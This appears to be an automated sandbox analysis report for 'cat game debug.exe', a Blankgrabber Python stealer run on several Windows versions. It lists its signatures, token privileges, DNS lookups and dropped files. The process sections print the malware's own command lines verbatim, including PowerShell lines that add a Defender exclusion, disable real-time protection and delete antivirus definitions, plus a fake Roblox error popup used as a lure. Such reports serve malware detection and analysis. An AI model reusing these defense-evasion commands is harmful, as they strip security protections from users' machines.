Analysis Overview
SHA256
dcb845da0cc3c03c4d2b54792413144131cc183228905ff583527815ed5c6095
Threat Level: Known bad
The file cat game debug.exe was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
Deletes Windows Defender Definitions
A stealer written in Python and packaged with Pyinstaller
Command and Scripting Interpreter: PowerShell
UPX packed file
Loads dropped DLL
Views/modifies file attributes
Detects videocard installed
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-17 18:09
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI45842\python310.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libffi-7.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI45842\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI45842\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI45842\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vm215t0i.fpz.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win11-20240508-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-zqbmd.in | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI48242\python310.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libffi-7.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI48242\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI48242\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI48242\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5t2rf5ap.fqv.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win7-20240508-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI21882\python310.dll
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win10-20240404-en
Max time kernel
133s
Max time network
135s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
